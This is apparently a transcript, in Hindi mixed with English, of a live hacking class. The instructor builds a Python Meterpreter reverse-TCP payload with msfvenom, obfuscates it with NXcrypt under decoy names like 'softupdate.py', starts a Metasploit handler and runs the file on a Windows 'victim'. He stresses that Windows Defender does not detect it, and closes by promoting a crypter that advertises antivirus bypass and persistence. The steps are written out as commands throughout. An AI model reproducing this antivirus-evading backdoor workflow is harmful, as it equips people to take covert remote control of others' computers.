आप लाइक अलग अलग तरीके से आप ये काम कर सकते हो। ठीक है, तो हमें हमें यहाँ पे क्या करना है, ./NX script.py, ठीक है यहाँ पे। उसके बाद हमें वो देना है कौन सा फाइल, जो हमारा एक्चुअल में कौन सा फाइल है, एक्चुअल में जो हमारा backdoor.py फाइल है, यानी कि जो हमारा एक्चुअल में जो हमारा पेलोड फाइल है हमें उसे देना है। ठीक है, तो हमें यहाँ पे दीजिए हाइफन फाइल, यहाँ पे इज इक्वल टू पेलोड फाइल हमारा कौन सा है भैया, तो हम क्या करते हैं /root में डेस्कटॉप में है, एंड ये जो है इसका नाम है softupdate.py। ठीक है, तो हमने ये फाइल दे दिया। ओके, अब यहाँ पे हमें कौन सा देना है, यहाँ पे हाइफन आउटपुट फाइल हाइफन आउटपुट फाइल। तो आउटपुट फाइल में हमें क्या देना है, लाइक अब दे देते हैं new soft.py ये वाला फाइल हमने दे दिया। ठीक है, तो ये क्रिएट हो गया इंक्रिप्शन फिनिश्ड। यहाँ पे आप देख रहे होगे, यहाँ पे इंक्रिप्शन फिनिश्ड, न्यू फाइल new soft.py हमारे पास
आ चुकी है। यानी कि हमारे पास एक नई फाइल आ गई है newsoft.py। nscript वाले फोल्डर में आप जाओगे यहाँ पे डायरेक्टरी के अंदर में, तो यहाँ पे आपको मिलेगी newsoft.py फाइल। ठीक है, अब ये फाइल जो है, एक काम करते हैं, अब इसको जो है हमने यहाँ से सिंपली कॉपी किया, यहाँ से हमने इसको यहाँ से पेस्ट कर दिया, हमने विंडोज में इसको पेस्ट कर दिया newsoft.py को। नाउ अगेन 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 लेट्स ट्राई। कोई कर रहा है मेरे साथ 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 कोई कर रहा है क्या आप में से? कोई भी कर रहा है या नहीं कर रहा है यार? हाँ, रीड कर सकते हैं, रीड करके हार्दिक, एंड अंदर में और भी जो भी मतलब गार्बेज वगैरह है वो डाल सकते हैं। पहले एक बार इसको देख लेते हैं। यहाँ पे हमने अब इसको MSF कंसोल को स्टार्ट करके हमें स्टार्ट करना है। तो लेट्स सी, लेट्स दिस कहाँ गया अपना, ये रहा। ठीक है, ओके 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 ओके। तो यहाँ पे हम करते हैं शो ऑप्शंस। ठीक है भैया, ऑप्शन सारे सही हैं, पेलोड लगा हुआ है, एवरीथिंग इज गुड। नाउ यहाँ पे हम एक्सप्लॉइट करते हैं, यहाँ पे एक्सप्लॉइट रिवर्स टीसी पे स्टार्ट करते हैं। नाउ वी आर गोइंग टू डू, आई एम गोइंग टू जस्ट क्लिक, डबल क्लिक इट, एग्जीक्यूट करके ट्राई करते हैं यहाँ पे। लेट्स सी एनीथिंग हैपनिंग और नॉट। ओके, कुछ भी नहीं हुआ, जस्ट वेट। एक बार और एग्जीक्यूट करते हैं, नथिंग हैपनिंग। पोर्ट पोर्ट सही नहीं है क्या? 1 2 3 4 ही था ना पोर्ट, उसी पे तो बनाई थी। ओके, डू वन थिंग, यहाँ पे एक बार एक काम कर लेते हैं, ओपन इन टर्मिनल, इसको एक बार एग्जीक्यूट कर लेते हैं। यहाँ से भी एग्जीक्यूट करके देख लेते हैं। न्यू सॉफ्ट, अरे भैया, न्यू सॉफ्ट डॉट पी वाई। ठीक है, ओके ओके, इट्स नॉट ओपनिंग। न्यू सॉफ्ट डॉट पी वाई करते हैं। तुम लोगों में से किसी का हुआ एग्जीक्यूट? एग्जीक्यूट हो रहा है किसी का? पोर्ट तो सही है, पोर्ट तो सही है। एनीवन जो साथ में कर रहे हैं उन किसी का एग्जीक्यूट हुआ तुम लोगों का? हाँ, एंटीवायरस डिटेक्ट करेगा, करेगा वेद प्रकाश। क्या कर रहे हैं? हाँ करो करो, जल्दी करो, जल्दी करो। ठीक है, जस्ट यहाँ पे एक बार इसको क्लोज करते हैं। डू वन थिंग, शो ऑप्शंस। आई थिंक कुछ आईपी का इशू हो गया क्या हमारा? आईपी तो सही लग तो रहा है। एक्सपेरिमेंटली पाइथन मीटरप्रेटर रिवर्स टीसीपी भी डल रहा है अपने। रन करके एक बार चेक करते हैं, एक बार रन में, लेट्स एग्जीक्यूट इट। ओके, मे बी आईपी का कुछ इशू होगा, जस्ट वेट, जस्ट एक बार चेक कर लेते हैं, है ना। लेट्स चेक एक बार कि इशू क्या हो रहा है यहाँ पे। यहाँ से ये हटा देते हैं, यहाँ से ये हटा देते हैं,
एंड सिंपली यहाँ से चलते हैं एग्जिट IF config 192.168.29.118 है, ठीक है। IP बिल्कुल वहाँ पे सही है। डू वन थिंग, यहाँ पे सॉफ्ट अपडेट जो है ना उसको भी हटा दो। NX स्क्रिप्ट से यहाँ पे हमारा स्क्रिप्ट हुआ था py रिमूव इट। अरे तुम लोग कौन जो मेरे साथ कर रहे थे उनका अभी तक नहीं हुआ क्या कुछ भी? ओपन इन टर्मिनल। ठीक है, एक काम करते हैं यहाँ पे, लेट्स क्रिएट द लाइक रॉ फॉर्मेट। यहाँ पे एक बार MSF वेनम -p पेलोड के लिए, ठीक है। पाइथन नहीं, ये तो अवेलेबल ही नहीं है। पाइथन मीटरप्रेटर रिवर्स TCP lhost 192.168.29.118 सही था। 12341111 कर देते हैं, 1111 -f यहाँ पे हम क्या कर देते हैं ना, यहाँ पे हम रॉ देते हैं एक बार, लेट्स सी -o यहाँ पे हमने रॉ दिया, -o में हमने दे दिया -o में हम दे देते हैं यहाँ पे अपडेट .py, ठीक है। update.py, that's it. Let's wait. चलो यहाँ पे क्लियर हो गया। यहाँ पे क्रिएट हो चुकी है update.py। क्या हुआ, किसका मैसेज? हाँ, ये यूज करना है, पाइथन मीटरप्रेटर रिवर्स TCP, ये वाला करना है, ठीक है। तो हमने ये कर दिया। अब हम क्या करते हैं, NX स्क्रिप्ट से पहले इसको स्क्रिप्ट भी कर ही देते हैं, है ना, update.py को। तो हमने क्या किया है, cd NX स्क्रिप्ट ./NX स्क्रिप्ट -फाइल। तो फाइल में यहाँ पे update.py दे देते हैं। आउटपुट में यहाँ पे न्यू अपडेट .py दे देते हैं, ठीक है। एंटर कर देते हैं। न्यू अपडेट.py हमारा क्रिएट हो चुका है, ठीक है। दैट्स इट। नाउ वी आर गोइंग टू चेक न्यू अपडेट.py, ठीक है। Everything is fine. Now take this new update.py and just copy it and हम इसको कर देते हैं कहाँ पे, पेस्ट या न्यू सॉफ्ट एंड न्यू, ये सॉफ्ट इन दोनों को रिमूव कर देते हैं। यहाँ पे न्यू अपडेट.py हमारा फाइल बन चुका है। नाउ वी आर गोइंग टू स्टार्ट द हैंडलर, जो हमारा हैंडलर जो नॉर्मली हम स्टार्ट करते हैं, वी आर गोइंग टू स्टार्ट इट। सो MSF console ठीक है। यहाँ पे MSF कंसोल में आ चुके हैं यहाँ पे। नाउ यूज एक्सप्लॉइट मल्टी हैंडलर, यहाँ पे पेलोड को चेंज कर देते हैं, सेट पेलोड पाइथन, अबे मीटरप्रेटर रिवर्स
सेट पेलोड पाइथन मीटरप्रेटर रिवर्स टीसीपी, ठीक है भैया, हो गया यहाँ पे। नाउ अगेन सेट एल होस्ट 192.168.29.118, सेट एल पोर्ट 1111, 4 बार 1 था हमारा, हो गया हमारा सारा शो ऑप्शंस, ठीक है। तो दैट्स इट गाइस, यहाँ पे ये सारी चीज़ें सेट हो गई, यहाँ पे हमारा सेट हो गया। अब हम यहाँ पे रन कर देते हैं, लेट्स सी व्हाट इज हैपनिंग। और यहाँ पे हम न्यू अपडेट डॉट एक्सवाई डॉट पाइथन को रन करके देख लेते एक बार। स्टिल नॉट सेशन आ नहीं रहा है ना, बट आना चाहिए, एक बार में नहीं तो 2 बार में आना चाहिए, है ना। कई बार एक मल्टीपल टाइम्स में आपके सेशन आते हैं, कई बार ऐसा होता है। तो लेट्स डू वन थिंग, ओके cd डेस्कटॉप, यहाँ पे पाइथन का पाइथन 3 है ना, ओके पाइथन 3, ठीक है पाइथन 3 यहाँ पे करते हैं न्यू, अरे भैया न्यू अपडेट पाइथन 3 न्यू अपडेट डॉट पी वाई, ओके let's see the properties here. फुल कंट्रोल भी है, सारी चीज़ें हैं, ठीक है, एवरीथिंग इज गुड। ओके यहाँ पे पाइथन न्यू अपडेट डॉट पी वाई, सिंटेक्स एरर, कुछ कोई ना कोई इशू तो हो रही है भैया। अगेन वी डिड नॉट गेट एक्चुअली, यहाँ पे एक्चुअली ये पाइथन फाइल सही से रन नहीं हो रही है, राइट। तो एक काम करते हैं, लेट्स डू वन थिंग, इस पाइथन फाइल को हमारे विंडोज़ पे मान लो रन होने में प्रॉब्लम हो रही है, ठीक है। लेट्स डू वन थिंग, हम इसको खुद के ही मशीन पे रन कर लेते हैं, ठीक है। सेम एरर आ रहा है ना, अभी पता चल जाएगा अभी पता चल जाएगा। ये जो है ना हमारा एन स्क्रिप्ट के अंदर में पाइथन फाइल, यहाँ पे न्यू अपडेट डॉट, जस्ट ओपन टर्मिनल हियर एंड chmod +x न्यू अपडेट डॉट पी वाई /new अपडेट डॉट पी वाई, इसको एग्जीक्यूट कर देते हैं एंड लेट्स चेक। यस, ये आ रहा है, ये देखो आ रहा है, मतलब ये एक्चुअली विंडोज़ के अभी सिस्टम पे, विंडोज़ वाले इन्वायरमेंट में प्रॉब्लम आ रही है। यहाँ पे आप देख सकते हो लिनक्स पे हमने स्टार्ट किया ना, तो स्टार्टेड रिवर्स टीसीपी हैंडलर और इतना सेंडिंग स्टेज फलान ठिकाना, ये हो रहा है, ये मतलब दिस इज गेटिंग कनेक्टेड, एवरीवन कैन सी है कि यहाँ पे हमारे लिनक्स में आराम से ये कनेक्ट हो रहा है। इसका मतलब यहाँ पे विंडोज़ में मे भी कुछ इशू अभी हो रहा होगा, मे भी उस फाइल के अंदर कुछ होगी। यहाँ पे आप देखो सेशन मीटरप्रेटर सेशन 2 ओपन है, यहाँ पे मीटरप्रेटर सेशन जो है वो आपका ओपन हो चुका है बेसिकली। यहाँ पे अगर आप ये आपका सिस इन्फो करोगे तो ये आपका लिनक्स का भी दिखा देगा, काली लिनक्स। बैकग्राउंड करके आप बैकग्राउंड कर दो, यहाँ पे सेशंस देख लो, यहाँ सेशंस ID 2 जो है ओपन हो चुकी है लिनक्स पाइथन, यानी कि ये आराम से ओपन हो रही है, ठीक है। यहाँ पे मे बी विंडोज़ का कुछ अभी इशू होगा, ठीक है। गॉट द शेल कहाँ पे, यश विंडोज़ पे गॉट द शेल, काली पे, हाँ हाँ काली पे शेल आ गया आपका, काली पे ये जो है आराम से एग्जीक्यूट हो चुका है। यहाँ पे कोई प्रॉब्लम अभी तक तो नहीं आई है, इसमें आराम से ही चल रहा है, ठीक है। स्टिल एक चीज़ ये है कि काली पे यहाँ पे चल रहा है, इससे हमें मतलब नहीं है, हमें मतलब है कि हमारी जो फाइल है ये सही है। इसका मतलब क्या हुआ कि हमारी जो न्यू अपडेट डॉट पी वाई फाइल है ये बिल्कुल सही है। सबसे बड़ी बात यह है कि इट इज़ नॉट गेटिंग डिटेक्टेड बाई योर एंटीवायरस। वट यू गॉट, क्या समझ में आया यहाँ पे
कि यहाँ पे आपका विंडोज डिफेंडर जो है भैया, ये आपके विंडोज डिफेंडर भी जो है इसको नहीं पकड़ पा रहे हैं, इसको कैच नहीं कर पा रहे। यू कैन सी, ये तो मान गए हो क्योंकि ये स्कैन में भी, अब जब इसको आप स्कैन भी कर रहे हो ना, फाइल तो सही है, तभी काली में आपका एग्जीक्यूशन हुआ है। विंडोज के साथ अभी कुछ इश्यू होगी, वो अपन देख लेंगे। तो यहाँ पे बट अगर आप डिफेंडर से स्कैन करते हो तो यू विल नॉट सी एनीथिंग, राइट। कोई भी चीज, नो करेंट थ्रेड्स, कोई थ्रेट नहीं है, ठीक है। आप सबने, जिसने जिसने ट्राई किया विंडोज डिफेंडर, स्कैन तो नहीं कर रहा ना उसको, मतलब डिटेक्ट तो नहीं कर रहा ना आप लोगों में से। आजाद का वर्क, आजाद तुम्हारा वर्क कर रहा है, बिल्कुल करेक्टली वर्क कर रहा है। हाँ, तो इसका मतलब आजाद का वर्क कर रहा है। मे बी शायद तुम्हारा पाइथन कौन सा वर्जन है, 3 सब, इसका मतलब तुम्हारा 3 नहीं होगा, इसका मतलब है तुम्हारा या तो 2 होगा, 2 होगा शायद मेरे ख्याल से। पाइथन वर्जन चेक करके बताओ आजाद, 3 है। सेम वर्जन पे हमारा एग्जीक्यूशन नहीं हो रहा, हमारा एग्जीक्यूशन नहीं हो रहा। नहीं, विंडोज डिफेंडर ऑफ करके रन करने का क्या क्या लॉजिक है, जब विंडोज डिफेंडर कैच ही नहीं कर पाना। आजाद, आजाद तुम बताओ, विंडोज डिफेंडर ऑन किया था, ऑफ किया था तुमने रन करने से पहले? नहीं किया, क्योंकि डिफेंडर तो कैच ही नहीं कर रहा, तो डिफेंडर को ऑफ क्यों करें? मेरे कहने का सेंस यही है कि डिफेंडर जब कैच ही नहीं कर रहा तो क्यों ऑफ करे डिफेंडर को? कनेक्शन के टाइम ब्लॉक हो रहा हो, इट माइट बी पॉसिबल, हो सकता है। मे बी, इट माइट बी पॉसिबल। एक बार काली, हम अपने काली में यहाँ भी पाइथन 3.1 ही है, 3 ही है पाइथन तो, पाइथन तो 3 ही है यहाँ पे। both have similar Python versions. Still विंडोज का थोड़ा सा मुझे डाउट हो रहा है, विंडोज का ऐसा होना नहीं चाहिए, बिकॉज फाइल इज एब्सोल्युटली करेक्ट, स्टिल वी आर गेटिंग like error or something like that, right? ये तुम देख रहे हो फाइल को यहाँ पे, न्यू अपडेट डॉट पी वाई। लेट्स सी वन थिंग। यहाँ पे चलते हैं nx स्क्रिप्ट vim new update डॉट पी वाई। ये पूरी आप देख सकते हो यहाँ पे विंडोज डिफेंडर डिटेक्ट कर रहा है। नहीं यार, ऐसा तो नहीं हो सकता, मेरे तो नहीं कर रहा बिल्कुल भी। विंडोज डिफेंडर डिटेक्ट तो मेरे नहीं कर रहा है। यहाँ पे आप देख सकते हो, यहाँ पे बेसिकली यहाँ पे कुछ कुछ ये आप देख सकते हो इनकोडिंग्स यूज़ कर गई है। बेस 64 यहाँ पे आपको नीचे दिख रहा होगा, बेस 64 यहाँ पे बहुत सारी इनकोडिंग्स यहाँ पे इस फाइल के अंदर की जाती हैं, बहुत सारी। इसमें कचरा होगा आपके, ये जो आपको दिख रहा है ये सारी कचरा जो है, ये कचरा भरा हुआ है एक तरह से इस पाइथन फाइल के अंदर में, जिसके अंदर में आपको ये सारी इनकोडिंग्स, सेल कोडिंग, ये सारी चीज़ आपको दिख जाएंगी बेसिकली। तो इसकी, जिसकी वजह से आपको ये जो है वो आपको कंप्लीट मिल रहा है, कंप्लीट एफयूडी मिल रही है आपको, ठीक है। तो अभी देखो जैसे अरे भैया, तुम्हारा आधार डिटेक्ट कैसे हो रहा है ये मुझे समझ नहीं आया। तो मतलब विंडोज में चल रहा है तुम्हारा हार्दिक, सेम सिमिलर? एक बार ठीक है, स्क्रीन शेयर कर दो एक बार, स्क्रीन शेयर कर दो एक बार हार्दिक। ओके, हार्दिक विल शेयर द स्क्रीन। ओके हार्दिक, नाउ नाउ यू कैन शेयर द स्क्रीन, अब करो। सर स्क्रीन दिख रहा है क्या? हाँ दिख रही है। ओके, सो सर ये चल रहा पीछे, वो शेल चल रहा है यहाँ पर, और ये यहाँ पे मिला हुआ मेरे को शेल। कहाँ पे? एक सेकेंड, तुमने सेम सेम सिमिलर स्टेप्स किए? हाँ सर।
मतलब ये मैंने पहले इसका फाइल इस्तेमाल किया था, ये हाँ ये एनक्रिप्ट का मैंने फाइल इस्तेमाल किया, तो इसमें नहीं रन हुआ मेरा। मैंने इसका फाइल रीड करने की भी कोशिश करी थी, एनविम से मैंने रीड करी थी इसकी फाइल, तो नहीं हो रहा था। बट मैंने जब इसकी फाइल जब रीड करी तो उसका तो मुझे लगा शायद ये हो सकता है, तो फिर ये हाँ वो तो नॉर्मल पेलोड हो गया ना, वो जो फाइल तुमने हाँ रीड करी वो नॉर्मल पेलोड हो गई। हाँ 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 वो बट वो वाली नॉर्मल। फाइल खुल ही नहीं रही थी, मतलब मेरे वो उसके अंदर भी नहीं खुली थी फाइल, टेक्स्ट एडिटर वगैरह में भी नहीं खुल रही थी इसकी फाइल, सो रीड नहीं कर पाया इसको। बट ये वाला मेरा डायरेक्टली चल गया, इसको मैंने रीड किया चल गया डायरेक्टली मेरा। इस वाले के अंदर पता नहीं मेरा ना सर UTF-8 का कुछ एरर आ रहा था कि वो ना /XF3 करके कुछ UTF-8 के अंदर होता नहीं है, सो वो एरर के चक्कर में फाइल नहीं चल रही थी ये वाली। मैं आपको एरर भी दिखा देता हूँ एक बार, उसको ऐसे बंद करके, ये रहा, ठीक है। तो हाँ, सो मैं इसको एंटर दबाऊंगा तो ये देखिए सर, ये मेरा एरर आया था। ये एरर सेम एरर आ रही है, सेम एरर हाँ मेरे साथ भी आ रहा है वो। हाँ बट मैंने फिर जब इसको डायरेक्टली इससे रन किया तो ये, हाँ ये रहा मेरा अपडेट वाला, तो इसको मैं ओपन करूँगा तो ये फिर यहाँ मुझे शेल मिल रहा है, ये देखो। ये हाँ राइट, वो चीज़ ही होनी चाहिए सेम हाँ जैसा। वही है। हाँ तुम्हारा वो चीज़ सेम होना चाहिए। ठीक है चलो एक बार स्क्रीन ऑफ कर लो। हाँ सर। आज़ाद एक बार स्क्रीन शेयर करो, तुम्हारा कौन सा डिटेक्शन कैसे हो रहा है ये समझ नहीं आया मुझे, एक बार स्क्रीन शेयर करो एक बार आज़ाद। हाँ क्या तुम क्या बोल रहे हो आज़ाद, किस तरह की डिटेक्शन बताओ एक बार। भैया मेरा नॉर्मल पेलोड था, इंपोर्ट नहीं किया उसको। नहीं मतलब नॉर्मल ही बनाया था ना, नॉर्मल एकदम नॉर्मल जैसे हाँ एम बिल्कुल एस बिल्कुल। है उसका एनक्रिप्ट नहीं किया था अभी मतलब हाँ इनक्रिप्ट नहीं किया था। एनएक्सक्रिप्ट से, राइट? हम्म। एनएक्सक्रिप्ट से करके देखो एक बार। तो उसी को इंस्टॉल कर रहा हूँ। एनएक्सक्रिप्ट नहीं इंस्टॉल है? नहीं सर, वो एरर आ रही है थोड़ी बहुत, तो उसको ही सॉल्व कर रहा हूँ अभी तक। तो एनएक्सक्रिप्ट इंस्टॉलेशन में क्या एरर आ रही है, ये नहीं समझा। ये तो नॉर्मली गिटहब से क्लोन करके चला दो एक बार डायरेक्ट। नहीं, ये कमांड्स वाला मॉड्यूल नहीं बता रहा, तो वही इंस्टॉल कर रहा हूँ। दिखाओ एक बार, काली में जाओ। ये क्या है ये? अरे एक नो मॉड्यूल्स नेम कमांड्स। हम्म। तुम पहले तो एक काम करो ना, अरे यार क्लियर करो, स्क्रीन क्लियर करो एक बार। एलएस करो, एलएस। ठीक है, इसको पहले तो परमिशन दे दी है एग्जीक्यूशन की। chmod+x नहीं। करो, एग्जीक्यूशन दो, पॉलिश मतलब उसको वो करो। ./encrypt.py-h लिखो, एग्जीक्यूट करो हाइफन। हाँ रूट से कर दो इसको, और हाँ ठीक है। पाइथन फाइल हैज़ नॉट गिवन, ठीक -h कर दो ना, -h। हाँ चल तो गया तुम्हारा। एग्जीक्यूट का तुमने परमिशन ही नहीं दिया था पहले, अब चल रहा है आराम से। इसको तुम पाइथन से भी चला के देखो एक बार। वो सर पाइथन 3 की जैसे हो रहा था। ये क्या कर रहे हो तुम? नहीं सर, मैं तो फाइल को सिलेक्ट करूँ। अरे तो उसका पूरा, हाँ हाइफन फाइल दे दो, हाइफन फाइल इज इक्वल टू फाइल का नाम दो। या हाँ ठीक है, तो -f, हाँ -f हो गया, उसका बाद -o दे दो। जो भी तुम फाइल नेम, जो आउटपुट तुम्हें चाहिए इनक्रिप्टेड आउटपुट, वो अपने नाम से दे दो कुछ भी। सेम नाम मत देना, कुछ और भी दे देना, कुछ और ऐड कर दो ना। करो ना payload.py। कर दो एंटर, हो गया payload.py बन गई। इसको हाँ भेजो सर। विंडोज में भेजो इसको।
payload.py मतलब विंडोज में कॉपी कर दिया है ना तुमने? अच्छा हाँ हाँ सर। ठीक है, इसको एग्जीक्यूट करके देखो, वहाँ पे पहले हैंडलर स्टार्ट कर लेना। हाँ हैंडलर में वो सारी डिटेल सही डाली है तुमने, आईपी वाईपी जो भी है? से डाल दी सर। हाँ मतलब सही डाली है ना आईपी जिससे पेलोड बनाया था? सर तो अभी वर्क नहीं कर रहा, पहले कर रहा था। हाँ पहले वो इस टूल के बाद वो प्रॉब्लम देखो। प्रॉब्लम क्या है ना, प्रॉब्लम तुम लोगों की प्रॉब्लम नहीं है या ऐसे कुछ हमारी प्रॉब्लम नहीं है। एक बार तुम एक पाइथन 3 से करके देखो एक बार। पाइथन 3 अच्छा पाइथन 3 है, ठीक है चलो चलो। तो जो पाइथन 3 ही है और अगर फिर भी टूल के बाद से हो रहा है तो ये टूल की प्रॉब्लम है। बट स्टिल क्या कर रहा है वो अपन देख लेंगे। वो टूल का प्रॉब्लम ये नॉन यूटीएफ वाला जो एरर आ रहा है, ठीक है, ये आप लोग सॉल्व करने का कोशिश कीजिएगा। मैं भी देखता हूँ क्या है ये एरर। नई एरर है जो इसके अंदर आ रही है, बट स्टिल एक बार लेट्स स्क्रीन ऑफ कर लो। सर आजाद का सर वाइल्ड कार्ड पे खुल रहा है सर वो हैंडलर, उसको क्यों एक बार सर आईपी सेट करके देखें। कौन सा? आजाद का सर वाइल्ड कार्ड पे खुल रहा है हैंडलर, 0.0.0 पे खुल रहा है, उसने शायद आईपी सेट नहीं कर रखा है। आईपी नहीं सेट कर रखा है? नहीं सेट बोल तो रहा है वो कर रहा है उसने। आजाद बट किया था हैंडलर आई। फिर 0.0.0 पे क्यों खुलेगा सर फिर? नहीं आजाद किया सर, था। वो तो सर बोलो। वो उसकी प्रॉब्लम नहीं है सर, वो फाइल एग्जीक्यूट नहीं हो रही ना यहाँ पे विंडोज में। हाँ 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 वो तो सर मैंने वाइल्ड कार्ड पे कर रखा है, वो किसी से भी कनेक्शन आ सकता है वो तो। हाँ हाँ ठीक है चलो ठीक है, कोई इशू नहीं है। वो ठीक है, कोई दिक्कत नहीं है। लेकिन मेन इशू है कि आपकी जो एनएक्स स्क्रिप्ट वाली जो आपकी जो फाइल है, जो आपका स्क्रिप्ट है, देखो अभी सी यहाँ पे स्क्रीन मेरी तो अभी शायद डिसेबल होगी ना। हाँ स्क्रीन शेयर कर देता हूँ। चलो स्क्रीन शेयर हो गई। ठीक है, नाउ लेट्स डू वन थिंग। ब्राउज़र पे चलते हैं। लेट्स गो टू एनएक्स स्क्रिप्ट। इन पे चलते हैं, थोड़ा वेट कर लो यार। अरे स्क्रीन कैसी नहीं दिख रही? दिख तो रही है, स्क्रीन शेयर कर तो दिया है। स्क्रीन शेयर आप लोग आप हाँ अब दिख रहा है, ठीक है ठीक है ठीक है। यहाँ पे चलते हैं, इश्यूज पे चलते हैं। यहाँ पे मे बी ऐसा कुछ टूल का इशू होगा। क्लोज में देखते हैं सॉल्व हो गई हो। लेट्स डू वन थिंग। इनवैलिड सिंटैक्स में कमांड मॉड्यूल्स, लेट्स सी व्हाट इज दोस मॉड्यूल्स है। ओके तो यहाँ पे आ रहा है प्लीज यूज पाइथन 2.7। इसका मतलब समझ में आ रहा है, इन्होंने पोर्ट शायद मे बी पोर्ट नहीं किया पाइथन 3 के लिए। इन्होंने वो किया नहीं है। सो आई थिंक ये पाइथन 2 के लिए बोल रहे हैं कि आप पाइथन 2 से ही आप चलाओ। आफ्टर कन्वर्टिंग द पेलोड टू FUD यूजिंग एनक्रिप्ट द पेलोड नो लॉन्गर ओपन अ मीटरप्रेटर सेशन। वाई इसको क्लोज भी कर दिया है। इसका मतलब ये पाइथन 2 में भी पाइथन 2 खोज रहे होंगे। इनकोडिंग वर्डियर्स इनकोडिंग ठीक है इसका। ओके इसका सीधा सीधा मतलब है लाइक इन्होंने पोर्ट नहीं किया है। इन्होंने सीधा सीधा लिखा भी था कि पाइथन 2 यूज़ करो, हम पाइथन 3 का वो कर रहे हैं। एनीबडी हैविंग पाइथन 2 इंस्टॉल्ड? किसी के पास पाइथन 2 है क्या अभी फिलहाल के लिए? हाँ हाँ आ सकता है, नेटकट पेंसी से हो सकता है, बट फिलहाल हमें इसी से करना है ना। पाइथन 2 को यूज़ कर रहा है फिलहाल?
दोनों जगह पे, दोनों जगह पे। दोनों जगह पे। चलो ठीक है, कोई बात नहीं, हटाओ। एक काम करना तुम लोग, एक काम करना, अभी फिर से वो उतना टाइम वेस्ट नहीं कर सकते हैं। जस्ट डू वन थिंग, क्या करना, इसको एज अ टास्क समझ लो और स्क्रीनशॉट भेज देना फटाफट, तब ये हो जाएगा। जब जो चीज़ें कर रहे हो सेम चीज़ें करनी है, बस पाइथन 2 इन्होंने पोर्ट्स में भी पोर्टिंग इशू है इनके साथ, पोर्ट सही से करा नहीं है या फिर करा ही नहीं है। यहाँ पे क्या करना ना, लाइक ट्राई यूजिंग NX स्क्रिप्ट टू script the Python payload using Python 2। पहले तो Python 2 का यूज करना है आपको, मतलब NX स्क्रिप्ट ऑलरेडी Python 2 को सपोर्ट कर ही रहा है। मतलब आपको क्या करना है ना, सिंपली ये करना, ट्राई यूजिंग NX स्क्रिप्ट टू स्क्रिप्ट द Python पेलोड एंड, ये यूजिंग नहीं होगा, पेलोड एंड एग्जीक्यूट ऑन विक्टिम सिस्टम इन Python 2 इन्वायरमेंट। ठीक है, Python 2 इन्वायरमेंट में आपको एग्जीक्यूट करना है पहले तो। उसके बाद ये हो गया आपका दूसरा पॉइंट, ये हो गया सेकेंड पॉइंट। फर्स्ट पॉइंट क्या है, जेनरेट पाइथन पेलोड यूजिंग MSF Venom इन काली इन Python 2 इन्वायरमेंट। ठीक है, आपको दोनों में Python 2 इन्वायरमेंट में जनरेट भी करना है एंड उसके बाद उसको एग्जीक्यूट भी करना है विंडोज के अंदर में विक्टिम पे, एंड उसके बाद देखना आपका हो जाएगा। ठीक है, मतलब इसमें मेन मोटिव हमारा ये था कि आपका जो पाइथन फाइल क्रिएट हो रहा है बेसिकली, वो आपका विंडोज जो है वो उसको डिफेंडर जो है वो उसको एक्चुअली में क्या कर रहा है ना, मतलब डिफेंडर उसको कैच नहीं कर पा रहा। ठीक है, डिफेंडर इज अनेबल टू कैच दैट पाइथन। ऐसा क्यों हो रहा है, अब आप ये समझिएगा। देखिए, जब भी आपने पाइथन बनाया, पाइथन का जो स्क्रिप्ट बनाया आपने, तो पाइथन वाली जो स्क्रिप्ट हो रही है आपकी, बन रही है, तो बेसिकली विंडोज समझता है कि पाइथन में हमारा स्क्रिप्ट बना है, पाइथन एक हमारा लैंग्वेज है, तो हमारी लैंग्वेज में हमारा वो कोई एग्जीक्यूशन को उतना ज़्यादा वो प्रायोरिटी नहीं दे रहा। वो ऐसा नहीं समझ रहा कि ये मेरे लिए डेंजरस हो सकता है, इसके अंदर कोई डेंजरस चीज़ें हो सकती हैं पॉसिबली। ठीक है, ऐसा वो मानता है। फिर भी जब आप एक दो बार पाइथन की नॉर्मल स्क्रिप्ट चला दोगे, नॉर्मल वाली पेलोड, विंडोज हो सकता है उसको लेटर ऑन डिटेक्ट कर ले, मे बी, होपफुली, ड्यू टू इट्स बिहेवियर, ड्यू टू इट्स रिपीटेड बिहेवियर। उसी की वजह से, फॉर दैट रीजन, सिंपली जब हमारा NX स्क्रिप्ट आता है वो काम में, जब उसको वो क्रिप्ट कर देता है कुछ फालतू की गार्बेज इनकोडिंग्स से, देन वो फुली अनडिटेक्टेबल हो जाता है। बट ये चीज़ आपको सिर्फ और सिर्फ पाइथन फाइल के लिए। अब दूसरी चीज़ ये है कि पाइथन में जब आपको मीटर पिटर सेशन मिलेगा, याद रखिएगा, मीटर पिटर सेशन will be having limited features। जो आपको जो मीटर पिटर सेशन मिलेंगे उसमें वो सारे सेशन नहीं मिलेंगे जो आपको नॉर्मली EXE वाले में, सारी फीचर्स नहीं मिलेंगे जो आपको नॉर्मली EXE वाले जब आप सेशन लेते हो, कंडक्ट कराते हो, आप जब सेशन एग्जीक्यूट करवा देते हो, उस समय जो आपको फीचर्स मिलते हो वो सारे नहीं मिलेंगे, कुछ लिमिटेड फीचर्स ही आपको मिलेंगे पाइथन वाले। इसके साथ ये भी इशू एक है, इसलिए दैट्स वाई इट इज़ वेरी मच इंपॉर्टेंट कि आप जो है एक FUD, कंप्लीट FUD जो है पेलोड आप जनरेट करें। उसके लिए आपको मैं एक चीज़ बताता हूँ, देखो, FUD क्रिप्टर कहाँ गया, ये रहा। ये देखो यहाँ पे एक, ये बेसिकली क्या है ना, देखो, व्हाट इज इट, इट्स अ नॉर्मल FUD क्रिप्टर वेबसाइट। इनका वेबसाइट है एक, यहाँ पे आप नीचे आओगे, यहाँ पे आप देख रहे हो कि लाइक द बेस्ट रैट PC 2022 FUD क्रिप्टर, ये वो फलाना ठिकाना, यहाँ पे ये देखो, यहाँ पे फुली अनडिटेक्टेबल मल्टी फाइल बाइंडर कोड इंजेक्शन प्रोसेस परसिस्टेंस स्टार्टअप इंस्टॉलेशन, मतलब परसिस्टेंस भी होगा इसमें, स्टार्टअप इंस्टॉलेशन भी होगा, डिले एग्जीक्यूशन, ये सब मतलब कुछ देर के बाद एग्जीक्यूशन होगा रहा है। ये सारी मतलब फाइल को, जो आपका एक्चुअल पेलोड फाइल है वो खत्म हो जाएगा, डिलीट हो जाएगी। ठीक है, ये सारी जो चीज़ें हैं ना, वो आपको यहाँ पे ऐसी जो क्रिप्टर्स होते हैं यहाँ पे आपको इसमें मिलते हैं। अब यहाँ पे देखो, इन शॉर्ट वी विल शो हाउ टू बाईपास विंडोज डिफेंडर, अवास्ट, कास्परस्काई, ईसेट, ये सब मतलब जितने भी मेन एंटीवायरसेस हैं वो सारे ये बाईपास कर देता है। ये क्रिप्टर की बात है
